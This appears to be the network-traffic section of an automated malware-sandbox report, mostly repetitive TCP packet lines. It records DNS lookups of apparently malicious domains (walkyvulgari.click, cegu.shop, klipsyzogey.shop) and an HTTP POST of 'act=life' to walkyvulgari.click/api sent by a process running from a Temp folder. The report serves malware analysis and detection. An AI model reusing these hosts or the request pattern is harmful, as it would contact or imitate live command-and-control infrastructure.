                                                                                                                                      Dec 27, 2024 10:22:09.744791031 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.744853973 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.744868040 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.744926929 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.750458002 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.750475883 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.750545979 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.750556946 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.750595093 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.756061077 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.756076097 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.756144047 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.756156921 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.756196022 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.919740915 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.919760942 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.919800043 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.919811010 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.919826984 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.919851065 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.924840927 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.924856901 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.924988031 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.924999952 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.925116062 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.929879904 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.929897070 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.929964066 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.929977894 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.930015087 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.935653925 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.935668945 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.935749054 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.935760021 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.935796976 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.941221952 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.941239119 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.941307068 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.941315889 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.941354036 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.946568966 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.946585894 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.946641922 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.946651936 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.946691036 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.952299118 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.952351093 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.952368975 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.952378035 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.952404976 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.952423096 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.957284927 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.957302094 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.957365990 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:09.957380056 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:09.957418919 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.121393919 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.121411085 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.121481895 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.121498108 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.121526957 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.121547937 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.126183987 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.126200914 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.126269102 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.126277924 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.126317978 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.131289959 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.131306887 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.131351948 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.131365061 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.131381989 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.131401062 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.136964083 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.136980057 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.137048006 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.137063026 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.137108088 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.142570972 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.142590046 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.142653942 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.142666101 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.142705917 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.147969961 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.147986889 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.148051023 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.148062944 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.148096085 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.153650045 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.153680086 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.153714895 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.153724909 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.153753042 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.153762102 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.158654928 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.158670902 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.158725977 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.158735991 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.158781052 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.322613955 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.322634935 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.322726965 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.322746038 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.322789907 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.327641964 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.327668905 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.327721119 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.327732086 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.327760935 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.327775955 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.333333969 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.333359003 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.333432913 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.333445072 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.333488941 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.338392019 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.338407993 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.338469028 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.338479996 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.338524103 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.343988895 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.344005108 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.344079018 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.344091892 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.344130993 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.349421024 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.349442959 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.349488974 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.349498987 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.349528074 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.349549055 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.355048895 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.355077028 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.355133057 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.355143070 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.355182886 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.360784054 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.360800982 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.360873938 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.360883951 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.360928059 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.523936987 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.523955107 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.523993969 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.524013042 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.524025917 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.524049044 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.529021978 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.529037952 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.529083967 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.529093981 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.529130936 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.534818888 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.534836054 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.534872055 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.534884930 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.534904003 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.534920931 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.539788008 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.539803028 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.539877892 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.539891958 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.539942026 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.545540094 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.545558929 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.545640945 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.545666933 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.545707941 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.550808907 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.550827026 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.550883055 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.550896883 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.550935030 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.556436062 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.556451082 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.556523085 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.556534052 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.556575060 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.562150955 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.562167883 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.562249899 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.562258959 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.562297106 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.725263119 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.725280046 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.725378036 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.725394964 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.725440025 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.730463028 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.730479002 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.730552912 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.730561972 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.730606079 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.736169100 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.736185074 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.736246109 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.736258984 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.736298084 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.741252899 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.741271019 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.741334915 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.741348028 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.741386890 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.747034073 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.747051001 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.747113943 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.747128010 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.747169971 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.752244949 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.752262115 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.752327919 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.752340078 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.752377987 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.757940054 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.757956028 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.758027077 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.758038044 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.758075953 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.763571024 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.763588905 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.763647079 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.763659000 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.763681889 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.763696909 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.766978979 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.767029047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.767031908 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.767044067 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.767070055 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.767705917 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.767765045 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.785052061 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.785070896 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:10.785084963 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:10.785093069 CET44349745172.67.214.186192.168.2.4

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Dec 27, 2024 10:21:08.998440981 CET6037953192.168.2.41.1.1.1
                                                                                                                                      Dec 27, 2024 10:21:09.222681046 CET53603791.1.1.1192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:23.534331083 CET5622853192.168.2.41.1.1.1
                                                                                                                                      Dec 27, 2024 10:21:24.245733023 CET53562281.1.1.1192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:38.511904955 CET5891953192.168.2.41.1.1.1
                                                                                                                                      Dec 27, 2024 10:21:38.652390003 CET53589191.1.1.1192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:46.739811897 CET5562453192.168.2.41.1.1.1
                                                                                                                                      Dec 27, 2024 10:21:47.215318918 CET53556241.1.1.1192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:49.393254995 CET5753053192.168.2.41.1.1.1
                                                                                                                                      Dec 27, 2024 10:21:49.707335949 CET53575301.1.1.1192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:50.120212078 CET6032153192.168.2.41.1.1.1
                                                                                                                                      Dec 27, 2024 10:21:50.338097095 CET53603211.1.1.1192.168.2.4

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Dec 27, 2024 10:21:08.998440981 CET192.168.2.41.1.1.10x2c0fStandard query (0)mzaisLRxVRUnOUQWdGyHcVQZJ.mzaisLRxVRUnOUQWdGyHcVQZJA (IP address)IN (0x0001)false
                                                                                                                                      Dec 27, 2024 10:21:23.534331083 CET192.168.2.41.1.1.10x7c4bStandard query (0)walkyvulgari.clickA (IP address)IN (0x0001)false
                                                                                                                                      Dec 27, 2024 10:21:38.511904955 CET192.168.2.41.1.1.10x9872Standard query (0)walkyvulgari.clickA (IP address)IN (0x0001)false
                                                                                                                                      Dec 27, 2024 10:21:46.739811897 CET192.168.2.41.1.1.10xde91Standard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                      Dec 27, 2024 10:21:49.393254995 CET192.168.2.41.1.1.10xb7fbStandard query (0)klipsyzogey.shopA (IP address)IN (0x0001)false
                                                                                                                                      Dec 27, 2024 10:21:50.120212078 CET192.168.2.41.1.1.10xd286Standard query (0)dfgh.onlineA (IP address)IN (0x0001)false

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Dec 27, 2024 10:21:09.222681046 CET1.1.1.1192.168.2.40x2c0fName error (3)mzaisLRxVRUnOUQWdGyHcVQZJ.mzaisLRxVRUnOUQWdGyHcVQZJnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Dec 27, 2024 10:21:24.245733023 CET1.1.1.1192.168.2.40x7c4bNo error (0)walkyvulgari.click104.21.94.92A (IP address)IN (0x0001)false
                                                                                                                                      Dec 27, 2024 10:21:24.245733023 CET1.1.1.1192.168.2.40x7c4bNo error (0)walkyvulgari.click172.67.221.152A (IP address)IN (0x0001)false
                                                                                                                                      Dec 27, 2024 10:21:38.652390003 CET1.1.1.1192.168.2.40x9872No error (0)walkyvulgari.click172.67.221.152A (IP address)IN (0x0001)false
                                                                                                                                      Dec 27, 2024 10:21:38.652390003 CET1.1.1.1192.168.2.40x9872No error (0)walkyvulgari.click104.21.94.92A (IP address)IN (0x0001)false
                                                                                                                                      Dec 27, 2024 10:21:47.215318918 CET1.1.1.1192.168.2.40xde91No error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                      Dec 27, 2024 10:21:49.707335949 CET1.1.1.1192.168.2.40xb7fbNo error (0)klipsyzogey.shop172.67.214.186A (IP address)IN (0x0001)false
                                                                                                                                      Dec 27, 2024 10:21:49.707335949 CET1.1.1.1192.168.2.40xb7fbNo error (0)klipsyzogey.shop104.21.23.250A (IP address)IN (0x0001)false
                                                                                                                                      Dec 27, 2024 10:21:50.338097095 CET1.1.1.1192.168.2.40xd286Name error (3)dfgh.onlinenonenoneA (IP address)IN (0x0001)false

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • walkyvulgari.click
                                                                                                                                      • cegu.shop
                                                                                                                                      • klipsyzogey.shop

                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.449733104.21.94.924434348C:\Users\user\AppData\Local\Temp\723356\Ted.com
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-27 09:21:25 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8
                                                                                                                                      Host: walkyvulgari.click
                                                                                                                                      2024-12-27 09:21:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                      Data Ascii: act=life
                                                                                                                                      2024-12-27 09:21:29 UTC1126INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 27 Dec 2024 09:21:29 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=3is60ap5s3kbc8p2b7mlh5mlc5; expires=Tue, 22 Apr 2025 03:08:08 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HjIFep407DUAG632ft3Jyq6ow55m3%2B%2FblAh0EH0O8BOVvEogGa5NxHdc4ORAK6Z5ugYT5bHEXuQzm0GeJQKPR5g0s4zbyh4GOsiFq7TICuxvoRNAYH0Bqyu7ryTh13K5WbdYKZM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8f883d888a5841bb-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
